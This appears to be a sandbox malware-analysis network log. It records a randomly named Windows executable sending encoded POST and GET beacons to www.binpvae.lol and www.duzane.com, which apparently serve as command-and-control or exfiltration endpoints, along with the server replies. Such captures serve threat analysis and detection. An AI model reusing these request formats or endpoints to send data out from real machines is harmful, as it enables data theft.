                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:36.323021889 CEST1748OUTPOST /a472/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.binpvae.lol
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.binpvae.lol
                                      Referer: http://www.binpvae.lol/a472/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 75 6b 31 78 2f 54 45 41 4a 74 30 74 74 4f 4e 6a 4a 6d 6c 58 54 71 38 79 6c 45 75 48 4c 47 49 50 44 57 75 2f 74 54 67 62 7a 2b 56 42 63 45 53 5a 58 2b 33 55 39 50 30 50 56 34 61 78 6c 6b 46 38 69 2b 6d 50 4f 77 2f 4e 61 4a 35 6b 34 44 62 48 6e 6c 69 69 43 73 48 57 72 49 73 77 2b 73 33 6d 77 77 34 4e 6a 77 31 37 67 6e 30 7a 4c 66 6d 78 78 51 63 36 48 4c 45 48 59 42 49 74 74 2f 6c 42 78 74 67 61 6c 57 77 74 79 74 48 33 32 71 73 6b 4d 45 47 30 4e 32 6a 41 6f 31 41 32 79 49 6f 63 79 44 53 61 45 78 36 6b 4e 4d 4a 41 59 43 62 72 37 4d 58 64 4d 49 49 32 63 57 68 4c 53 6b 6e 2f 75 6c 2f 46 6e 4d 57 58 71 39 47 53 7a 74 49 4b 6c 57 52 35 6e 75 31 31 44 6b 53 31 45 73 2b 55 6c 74 58 2f 68 34 2b 54 31 43 45 42 48 63 63 72 53 69 4e 62 54 6b 44 65 43 2b 66 6f 72 4d 37 50 71 44 2f 61 6b 50 53 56 4c 36 79 34 4c 50 76 36 35 6c 44 6a 4a 72 59 4b 71 36 57 79 48 73 4c 44 4d 33 4c 58 79 32 75 72 4f 76 39 41 32 77 4d 2b 64 41 33 46 54 77 6f 59 64 66 4a 48 70 75 4b 53 47 67 30 31 43 2f 67 65 66 57 [TRUNCATED]
                                      Data Ascii: TTv82Lg=uk1x/TEAJt0ttONjJmlXTq8ylEuHLGIPDWu/tTgbz+VBcESZX+3U9P0PV4axlkF8i+mPOw/NaJ5k4DbHnliiCsHWrIsw+s3mww4Njw17gn0zLfmxxQc6HLEHYBItt/lBxtgalWwtytH32qskMEG0N2jAo1A2yIocyDSaEx6kNMJAYCbr7MXdMII2cWhLSkn/ul/FnMWXq9GSztIKlWR5nu11DkS1Es+UltX/h4+T1CEBHccrSiNbTkDeC+forM7PqD/akPSVL6y4LPv65lDjJrYKq6WyHsLDM3LXy2urOv9A2wM+dA3FTwoYdfJHpuKSGg01C/gefWNyT65WllRkudORJDIYg/QNmXVpl4YpKHgqjTChRmfoi6YJTBucb5OSe86TvwUKzphUKrJ8v4HzZ+rNVmy/9Wy6Z9gVAnU0JS3P1a2wKQm4EvU2byuUC8rYm901DGrT4Nzo30eIxLVTSTvSmZpfbSqVEg/hZCIWrajNiPsdPrPR4GIk0l+3MkMObq3kGq6tqpDXn3k8OB5qV581FWBrIbSFcHjD4x7IOXAksX/qhWuPzJFMO8CH9V36xttx0JlIddkYucn5r1m9zG+eU1uT3w65Vtev/Ix0UIz2FXKinsD6keTDrbCbDCguqmGKMvJDm7QpCoGCO1YC/sVO3FpYWrkiUf03+VQCiCz7/nONUDZVNODggUEV/6gnWAxib3znyR6SxyY5JnD+bblgxlLGr4q1dnIgcMquAwKUX1sNvXVETvriH4g8UcsmYRkQNmVwCghLO2g94UueVSOmOWzcrjv2tgCLB46MpsPG3riUKUzZuNBaWbuDcje3x2QtuPlqz6BmycQq+8ZZBBh6SuNalT/4XiN7J6CwLido1KW2Jha8+dvIualJcX4nAHCZskOWo7hTmQcNNZcQxkmFpKP3/7Ih636Csi5mnUCQ/WPsp1tCsrHBrirrX8LaX9RFXEchlvxz15ZQvlY3F3/9/FSxBwPowUC0YoeFO95E [TRUNCATED]
                                      Jun 10, 2024 10:21:37.434442997 CEST146INHTTP/1.1 404 Not Found
                                      Content-Type: text/plain
                                      Date: Mon, 10 Jun 2024 08:21:37 GMT
                                      Content-Length: 18
                                      Connection: close
                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                      Data Ascii: 404 page not found


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.551378116.213.43.190802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:39.107621908 CEST454OUTGET /a472/?TTv82Lg=jmdR8js2K745w9duG20fYqFnwU+bCGk1cWKHz342ws1XHieKZe3C99dpKKnD83tJkcayHzCeZ9pypijZiF65Efqxzc0IleT34n8kjQ1m2nEIGr+ujgw0M5ErIDQmrZA0lA==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.binpvae.lol
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:21:40.262609005 CEST146INHTTP/1.1 404 Not Found
                                      Content-Type: text/plain
                                      Date: Mon, 10 Jun 2024 08:21:39 GMT
                                      Content-Length: 18
                                      Connection: close
                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                      Data Ascii: 404 page not found


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.551379102.222.124.13802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:45.341546059 CEST708OUTPOST /6tsi/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.duzane.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.duzane.com
                                      Referer: http://www.duzane.com/6tsi/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 36 30 34 67 56 68 2f 6c 47 75 62 66 7a 4f 4d 54 48 4c 62 54 4d 45 53 48 6b 79 54 78 57 43 48 66 37 78 66 59 78 51 63 36 58 62 2f 35 46 54 5a 51 49 31 6b 41 37 48 70 6c 6a 7a 58 6f 45 62 68 38 55 6e 52 44 78 43 44 53 66 37 55 73 6d 34 49 32 4c 30 79 4b 42 49 55 48 6a 57 69 37 64 63 4e 53 32 7a 53 35 78 30 61 7a 42 7a 58 73 65 2b 64 69 34 7a 61 52 39 66 6a 66 52 32 44 32 61 75 7a 51 50 4b 41 73 37 75 63 42 66 6f 70 76 6a 7a 59 4a 52 61 30 57 53 50 44 6b 43 62 6f 4a 6b 2b 67 39 67 53 2b 6f 77 74 4e 52 43 6a 77 39 71 4e 72 77 44 77 31 31 6e 6a 79 6c 56 4f 77 74 43 49 68 2f 74 55 7a 63 65 61 49 3d
                                      Data Ascii: TTv82Lg=604gVh/lGubfzOMTHLbTMESHkyTxWCHf7xfYxQc6Xb/5FTZQI1kA7HpljzXoEbh8UnRDxCDSf7Usm4I2L0yKBIUHjWi7dcNS2zS5x0azBzXse+di4zaR9fjfR2D2auzQPKAs7ucBfopvjzYJRa0WSPDkCboJk+g9gS+owtNRCjw9qNrwDw11njylVOwtCIh/tUzceaI=
                                      Jun 10, 2024 10:21:46.481997967 CEST990INHTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 795
                                      date: Mon, 10 Jun 2024 08:21:45 GMT
                                      server: LiteSpeed
                                      location: https://www.duzane.com/6tsi/
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.551380102.222.124.13802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:47.876007080 CEST728OUTPOST /6tsi/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.duzane.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.duzane.com
                                      Referer: http://www.duzane.com/6tsi/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 36 30 34 67 56 68 2f 6c 47 75 62 66 68 2f 38 54 46 73 76 54 4b 6b 53 45 72 53 54 78 66 69 48 62 37 78 54 59 78 56 39 68 55 74 50 35 46 79 46 51 50 45 6b 41 38 48 70 6c 73 54 58 70 63 37 68 4e 55 6e 64 39 78 41 58 53 66 37 41 73 6d 35 34 32 4c 44 6d 4a 44 59 55 46 71 32 69 35 51 38 4e 53 32 7a 53 35 78 30 4f 56 42 7a 50 73 66 4f 4e 69 35 53 61 53 33 2f 6a 63 46 6d 44 32 65 75 7a 4d 50 4b 41 4b 37 72 30 6e 66 72 52 76 6a 79 49 4a 53 4c 30 5a 63 50 44 6d 4e 37 70 58 76 75 4e 4d 6f 42 6d 78 77 75 52 51 63 41 6f 30 6d 62 47 61 5a 53 39 64 30 44 65 64 46 64 34 61 54 34 41 57 33 33 6a 73 41 4e 65 62 6c 75 70 68 70 43 70 74 59 47 69 59 38 77 33 6d 74 4d 6d 50
                                      Data Ascii: TTv82Lg=604gVh/lGubfh/8TFsvTKkSErSTxfiHb7xTYxV9hUtP5FyFQPEkA8HplsTXpc7hNUnd9xAXSf7Asm542LDmJDYUFq2i5Q8NS2zS5x0OVBzPsfONi5SaS3/jcFmD2euzMPKAK7r0nfrRvjyIJSL0ZcPDmN7pXvuNMoBmxwuRQcAo0mbGaZS9d0DedFd4aT4AW33jsANebluphpCptYGiY8w3mtMmP
                                      Jun 10, 2024 10:21:49.008356094 CEST990INHTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 795
                                      date: Mon, 10 Jun 2024 08:21:48 GMT
                                      server: LiteSpeed
                                      location: https://www.duzane.com/6tsi/
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.551381102.222.124.13802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:50.415906906 CEST1745OUTPOST /6tsi/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.duzane.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.duzane.com
                                      Referer: http://www.duzane.com/6tsi/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 36 30 34 67 56 68 2f 6c 47 75 62 66 68 2f 38 54 46 73 76 54 4b 6b 53 45 72 53 54 78 66 69 48 62 37 78 54 59 78 56 39 68 55 74 48 35 47 41 4e 51 49 58 63 41 39 48 70 6c 6c 7a 58 73 63 37 68 71 55 6a 35 35 78 41 72 6f 66 35 34 73 6b 61 67 32 4a 32 61 4a 4b 59 55 46 31 6d 69 30 64 63 4e 39 32 7a 44 79 78 33 32 56 42 7a 50 73 66 49 70 69 39 44 61 53 6b 76 6a 66 52 32 44 69 61 75 7a 77 50 4c 70 2f 37 72 77 52 66 62 78 76 6a 54 34 4a 51 35 4d 5a 55 50 44 67 4f 37 70 66 76 75 42 58 6f 43 43 39 77 74 4d 33 63 41 51 30 69 2f 58 31 45 53 39 44 77 46 57 74 4e 39 4d 43 4c 34 31 77 70 78 2f 61 46 4e 53 36 75 50 5a 36 70 69 46 70 56 56 48 38 6c 42 37 32 6b 37 57 45 37 6b 48 6f 34 77 6d 31 54 6a 4a 4d 39 44 4e 45 58 52 55 30 59 74 76 51 45 50 36 42 39 57 71 54 65 71 48 50 75 73 32 50 6f 61 2f 55 41 39 47 66 50 64 79 34 46 57 74 63 71 70 59 2f 67 78 55 6f 79 62 6a 37 4d 43 68 30 4e 57 45 4a 5a 32 6f 6e 66 36 34 38 4e 73 52 2b 41 69 74 50 4f 79 4b 59 69 66 65 42 54 63 31 65 6d 6c 31 42 47 35 [TRUNCATED]
                                      Data Ascii: TTv82Lg=604gVh/lGubfh/8TFsvTKkSErSTxfiHb7xTYxV9hUtH5GANQIXcA9HpllzXsc7hqUj55xArof54skag2J2aJKYUF1mi0dcN92zDyx32VBzPsfIpi9DaSkvjfR2DiauzwPLp/7rwRfbxvjT4JQ5MZUPDgO7pfvuBXoCC9wtM3cAQ0i/X1ES9DwFWtN9MCL41wpx/aFNS6uPZ6piFpVVH8lB72k7WE7kHo4wm1TjJM9DNEXRU0YtvQEP6B9WqTeqHPus2Poa/UA9GfPdy4FWtcqpY/gxUoybj7MCh0NWEJZ2onf648NsR+AitPOyKYifeBTc1eml1BG5TC+lcNejQ/4sPPg6DdRRtOsXTwOKS5fX1CPestRRKBDyHNvRL6M+eTMLRYI2Kyz1dJE/XYS6CO0EJxtYOr1m6ljDYwykZiIO23mzIQyiQT/pV40d1m7WeqrQmFkTaXfJ0VQPVlFT7gvjOiuOFmc2/u5FQA4kX+ah+qa8f9w98MQezVFAD1ZV213sC+jcsw/IDdFgSTXYkKGVjaxkfhoa21xbKcvRfkE4vtUetGYGMvT/QLHftq7lAG2bUMAX3qL09+0gbPir+/c2a1bhbIVlxOU6IDWZ7F0+DgBrxFPvymtDjEe3sT3FjTimFo4/g4lWz4eWcKsiVqnwdFRBosfLpWRymdzXRA1Kfig3Rx/1NByhbcf1Llo6zCxxAGBa/Hp3RHNa9NttihsztsrBn0tnq8JTLH/J757nAklMEm6v2b0660UBhiBKI0QhgUwudcv43THmfgU49Hog+U5aKZWxonrbAeYCJtB3yBH4xbut8jja6700lClhgVAGte2sqn7OQYfPqsCEsBjQPfRbrJT2BVmLY2cbcTNyA0eWsNvR20n+Q1qAEISOA9FUCtxdkRqFdseu7rSXmY6h/NJaYNT2S8OGshRdUkd4Aw/nTagSbTTvskGo3Vm1VWN6+gNfKMzze6EE3wq6897XDYS30DeerIm7c6knW3q7C9 [TRUNCATED]
                                      Jun 10, 2024 10:21:51.753051043 CEST990INHTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 795
                                      date: Mon, 10 Jun 2024 08:21:51 GMT
                                      server: LiteSpeed
                                      location: https://www.duzane.com/6tsi/
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.551382102.222.124.13802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:52.948385000 CEST453OUTGET /6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.duzane.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:21:54.076908112 CEST1144INHTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 795
                                      date: Mon, 10 Jun 2024 08:21:53 GMT
                                      server: LiteSpeed
                                      location: https://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                      Jun 10, 2024 10:21:54.331718922 CEST1144INHTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 795
                                      date: Mon, 10 Jun 2024 08:21:53 GMT
                                      server: LiteSpeed
                                      location: https://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.55138335.241.34.216802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
